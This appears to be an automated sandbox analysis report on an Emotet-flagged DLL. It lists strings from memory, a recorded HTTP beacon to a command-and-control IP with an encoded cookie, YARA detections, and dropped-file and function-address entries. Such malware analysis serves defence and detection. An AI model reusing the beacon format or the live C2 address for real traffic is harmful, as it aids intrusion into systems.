                      Source: svchost.exe, 0000000A.00000002.446840907.0000017F2F629000.00000004.00000001.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Routes/
                      Source: svchost.exe, 0000000A.00000003.417063384.0000017F2F643000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000002.451867623.0000017F2F644000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.417049148.0000017F2F642000.00000004.00000001.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Traffic/Incidents/
                      Source: svchost.exe, 0000000A.00000003.409525624.0000017F2F669000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000002.459029231.0000017F2F66B000.00000004.00000001.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Transit/Stops/
                      Source: svchost.exe, 0000000A.00000003.409552132.0000017F2F652000.00000004.00000001.sdmpString found in binary or memory: https://dev.ditu.live.com/mapcontrol/logging.ashx
                      Source: svchost.exe, 0000000A.00000002.442020760.0000017F2F613000.00000004.00000001.sdmpString found in binary or memory: https://dev.ditu.live.com/mapcontrol/mapconfiguration.ashx?name=native&v=
                      Source: svchost.exe, 0000000A.00000002.446840907.0000017F2F629000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.362651281.0000017F2F634000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Imagery/Copyright/
                      Source: svchost.exe, 0000000A.00000003.417063384.0000017F2F643000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000002.451867623.0000017F2F644000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.417049148.0000017F2F642000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/JsonFilter/VenueMaps/data/
                      Source: svchost.exe, 0000000A.00000003.362651281.0000017F2F634000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Locations
                      Source: svchost.exe, 0000000A.00000002.446840907.0000017F2F629000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/
                      Source: svchost.exe, 0000000A.00000003.409552132.0000017F2F652000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Driving
                      Source: svchost.exe, 0000000A.00000003.409552132.0000017F2F652000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Transit
                      Source: svchost.exe, 0000000A.00000003.409552132.0000017F2F652000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Walking
                      Source: svchost.exe, 0000000A.00000002.446840907.0000017F2F629000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Traffic/Incidents/
                      Source: svchost.exe, 0000000A.00000003.410767896.0000017F2F64F000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000002.453634339.0000017F2F650000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Transit/Schedules/
                      Source: svchost.exe, 0000000A.00000003.362651281.0000017F2F634000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Transit/Stops/
                      Source: svchost.exe, 0000000A.00000002.446840907.0000017F2F629000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/mapcontrol/HumanScaleServices/GetBubbles.ashx?n=
                      Source: svchost.exe, 0000000A.00000003.409552132.0000017F2F652000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/mapcontrol/logging.ashx
                      Source: svchost.exe, 0000000A.00000002.452763932.0000017F2F64A000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.417049148.0000017F2F642000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.417035105.0000017F2F649000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/webservices/v1/LoggingService/LoggingService.svc/Log?
                      Source: svchost.exe, 0000000A.00000003.362651281.0000017F2F634000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/webservices/v1/LoggingService/LoggingService.svc/Log?entry=
                      Source: svchost.exe, 00000026.00000003.736509284.00000184DC77E000.00000004.00000001.sdmp, svchost.exe, 00000026.00000003.736795820.00000184DCC02000.00000004.00000001.sdmpString found in binary or memory: https://disneyplus.com/legal.
                      Source: svchost.exe, 0000000A.00000003.415890921.0000017F2F64D000.00000004.00000001.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gd?pv=1&r=
                      Source: svchost.exe, 0000000A.00000003.417035105.0000017F2F649000.00000004.00000001.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdi?pv=1&r=
                      Source: svchost.exe, 0000000A.00000002.452763932.0000017F2F64A000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.417035105.0000017F2F649000.00000004.00000001.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdv?pv=1&r=
                      Source: svchost.exe, 0000000A.00000003.417044646.0000017F2F647000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.410767896.0000017F2F64F000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000002.453634339.0000017F2F650000.00000004.00000001.sdmpString found in binary or memory: https://dynamic.t
                      Source: svchost.exe, 0000000A.00000003.409552132.0000017F2F652000.00000004.00000001.sdmpString found in binary or memory: https://dynamic.t0.tiles.ditu.live.com/comp/gen.ashx
                      Source: svchost.exe, 0000000A.00000002.446840907.0000017F2F629000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.362651281.0000017F2F634000.00000004.00000001.sdmpString found in binary or memory: https://ecn.dev.virtualearth.net/REST/v1/Imagery/Copyright/
                      Source: svchost.exe, 0000000A.00000003.417063384.0000017F2F643000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000002.451867623.0000017F2F644000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.417049148.0000017F2F642000.00000004.00000001.sdmpString found in binary or memory: https://ecn.dev.virtualearth.net/mapcontrol/mapconfiguration.ashx?name=native&v=
                      Source: svchost.exe, 0000000A.00000003.362651281.0000017F2F634000.00000004.00000001.sdmpString found in binary or memory: https://ecn.dev.virtualearth.net/mapcontrol/roadshield.ashx?bucket=
                      Source: svchost.exe, 0000000A.00000002.451257545.0000017F2F641000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/comp/gen.ashx
                      Source: svchost.exe, 0000000A.00000002.446840907.0000017F2F629000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gd?pv=1&r=
                      Source: svchost.exe, 0000000A.00000003.362651281.0000017F2F634000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdi?pv=1&r=
                      Source: svchost.exe, 0000000A.00000003.362651281.0000017F2F634000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdv?pv=1&r=
                      Source: svchost.exe, 0000000A.00000003.362651281.0000017F2F634000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gri?pv=1&r=
                      Source: svchost.exe, 0000000A.00000002.450562403.0000017F2F63D000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.362651281.0000017F2F634000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.tiles.virtualearth.net/tiles/gen
                      Source: svchost.exe, 0000000A.00000003.417058867.0000017F2F63E000.00000004.00000001.sdmpString found in binary or memory: https://t0.tiles.ditu.live.com/tiles/gen
                      Source: svchost.exe, 00000026.00000003.736509284.00000184DC77E000.00000004.00000001.sdmp, svchost.exe, 00000026.00000003.736795820.00000184DCC02000.00000004.00000001.sdmpString found in binary or memory: https://www.disneyplus.com/legal/privacy-policy
                      Source: svchost.exe, 00000026.00000003.736509284.00000184DC77E000.00000004.00000001.sdmp, svchost.exe, 00000026.00000003.736795820.00000184DCC02000.00000004.00000001.sdmpString found in binary or memory: https://www.disneyplus.com/legal/your-california-privacy-rights
                      Source: svchost.exe, 00000026.00000003.739051194.00000184DC780000.00000004.00000001.sdmpString found in binary or memory: https://www.tiktok.com/legal/report/
                      Source: svchost.exe, 00000026.00000003.739051194.00000184DC780000.00000004.00000001.sdmpString found in binary or memory: https://www.tiktok.com/legal/report/feedback
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 25_2_02963394 InternetReadFile,
                      Source: global trafficHTTP traffic detected: GET /fqwqvIpxZYjgSrhYeuylraBSZOVBNdJZxHBzTVnNstuWavuGlHdFStXKFDN HTTP/1.1Cookie: gKjP=1pPfMaoMdVUlKQUbAdiebE1XTzpT49WAqPCFzf9esRtAAep5qXcDMA3UcMnz2kDny2NkJZ+XzMNPrbuwewGy7ajRk6O8pCIMyS/tk7KPZ1sVOCZDzij8ol0kzhAKz+cyhczW5/Qg7WStsqckEM0Ai/TBhgYa4zLpY2xrkvKaCs5ZjXU46E7u7NfJ6u2+utMTe+1C5zhUB/BGEkeunoDpKbWBm9Kwrc3B7WoAGu/lbHZZe8hOoLZlL9MMnyWT3k4lhqZIOv4dj0Q=Host: 45.63.5.129Connection: Keep-AliveCache-Control: no-cache
                      Source: unknownHTTPS traffic detected: 45.63.5.129:443 -> 192.168.2.5:49804 version: TLS 1.2

                      E-Banking Fraud:

                      barindex
                      Yara detected EmotetShow sources
                      Source: Yara matchFile source: 0.0.loaddll32.exe.1523618.10.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.rundll32.exe.520000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.0.loaddll32.exe.1523618.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 25.2.rundll32.exe.2960000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.0.loaddll32.exe.14d0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 14.2.rundll32.exe.33d0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.1523618.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.rundll32.exe.2a521e0.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.1523618.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.rundll32.exe.2a521e0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.rundll32.exe.35f21e8.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.700000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 14.2.rundll32.exe.35624d0.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.0.loaddll32.exe.14d0000.6.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 14.2.rundll32.exe.35624d0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.14d0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.rundll32.exe.33e0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.0.loaddll32.exe.1523618.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.rundll32.exe.6d0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.0.loaddll32.exe.14d0000.6.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 14.2.rundll32.exe.33d0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.rundll32.exe.520000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.0.loaddll32.exe.1523618.7.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.0.loaddll32.exe.14d0000.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.rundll32.exe.33e0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.0.loaddll32.exe.1523618.7.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.0.loaddll32.exe.14d0000.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.rundll32.exe.6d0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.2963508.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.0.loaddll32.exe.14d0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 25.2.rundll32.exe.2960000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.0.loaddll32.exe.1523618.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.0.loaddll32.exe.1523618.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.14d0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.0.loaddll32.exe.14d0000.9.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.rundll32.exe.35f21e8.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.0.loaddll32.exe.1523618.10.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.0.loaddll32.exe.14d0000.9.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.2963508.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.700000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000004.00000002.490792818.00000000006D0000.00000040.00000010.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000000.516872338.00000000014D0000.00000040.00000010.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000000.493687779.00000000014D0000.00000040.00000010.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000019.00000002.762912607.0000000002960000.00000040.00000010.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000000.515626652.000000000151C000.00000004.00000020.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000E.00000002.592715201.000000000354A000.00000004.00000020.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000000.515526987.00000000014D0000.00000040.00000010.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.471143849.000000000294A000.00000004.00000020.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.544935545.00000000014D0000.00000040.00000010.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000000.495396645.000000000151C000.00000004.00000020.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.492232954.0000000002A3A000.00000004.00000020.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.475419249.0000000000520000.00000040.00000010.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000000.495107069.00000000014D0000.00000040.00000010.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.459775725.0000000000749000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000000.493911106.000000000151C000.00000004.00000020.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000E.00000002.592655915.00000000033D0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.494249926.00000000035DA000.00000004.00000020.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.470997195.0000000000700000.00000040.00000010.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000019.00000003.697774412.0000000002B7B000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.494093661.00000000033E0000.00000040.00000010.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000000.516972039.000000000151C000.00000004.00000020.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.545005644.000000000151C000.00000004.00000020.sdmp, type: MEMORY

                      System Summary:

                      barindex
                      Source: 3pO1282Kpx.dllStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL, LARGE_ADDRESS_AWARE
                      Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 2616 -ip 2616
                      Source: C:\Windows\SysWOW64\rundll32.exeFile deleted: C:\Windows\SysWOW64\Qfdohhzjskeoxat\kmkxxcep.fzg:Zone.IdentifierJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\SysWOW64\Qfdohhzjskeoxat\Jump to behavior
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6EE777B4
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6EE79F10
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6EE71DE0
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6EE7D530
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6EE73A90
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6EE8E3A1
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6EE80380
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6EE810C0
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6EE768B0
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6EE7A890
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6EE7E890
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6EE76070
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_0053EA55
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_0052B464
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_0052243F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_00529824
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_005292C1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_005420CE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_005310CD
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_005340FE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_00541291
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_0052CF6E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_00533D0C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_00539124
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_00533782
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_0053DB87
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_00526453
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_0052CE5A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_00533043
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_0052AE43
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_00537445
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_0052AA4E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_0052544C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_0053B677
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_0052FA78
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_0052387F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_0052EE60
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_00526869
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_00523A6C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_0054261E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_0053C205
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_0052800A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_00523432
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_00523228
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_0053282D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_005352D1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_005290D4
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_005328D5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_00541CDB
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_00522CC2
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_005284F0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_005362F5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_00534CF5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_005246FA
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_00521EFB
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_005240E2
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_0052C0EA
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_005356E9
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_00530A93
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_0053CE90
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_00530E97
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_0053A29B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_0053009A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_0053E899
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_0052FE9D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_0052A083
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_0052F48A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_00536540
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_00540370
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_0052BD61
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_0052CB13
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_00524D1E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_0053970A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_0053E10A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_0053590E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_0053BF0C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_0053CD35
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_0052F73B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_0052A92F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_005275D2
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_005219C0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_0052A3E7
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_0053EDED
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_005251EC
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_00531591
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_0052B191
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_00527795
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_00528D80
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_00524B81
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_0052358B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_0053E3B5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_005385B8
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_005243BE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_005259BF
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_0053D7BE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_005389A2
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_0053E5A7
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_0053DDA5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_00530BA4
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_6EE777B4
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_6EE79F10
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_6EE71DE0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_6EE7D530
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_6EE73A90
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_6EE8E3A1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_6EE80380
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_6EE810C0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_6EE768B0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_6EE7A890
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_6EE7E890
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_6EE76070
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_006EEA55
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_006F1291
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_006D3A6C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_006DB464
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_006DEE60
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_006D387F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_006DFA78
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_006EB677
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_006D544C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_006DAA4E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_006E7445
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_006E3043
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_006DAE43
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_006DCE5A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_006D6453
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_006E282D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_006D3228
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_006D9824
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_006D243F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_006D3432
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_006D800A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_006EC205
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_006F261E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_006DC0EA
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_006E56E9
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_006D40E2
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_006E40FE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_006D1EFB
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_006D46FA
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_006E62F5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_006E4CF5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_006D84F0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_006F20CE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_006E10CD
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_006D92C1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_006D2CC2
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_006F1CDB
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_006D90D4
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_006E28D5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_006E52D1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_006DF48A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_006DA083
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_006DFE9D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_006E009A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_006EA29B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_006EE899
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_006E0E97
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_006E0A93
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_006ECE90
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_006DCF6E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_006DBD61
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_006F0370
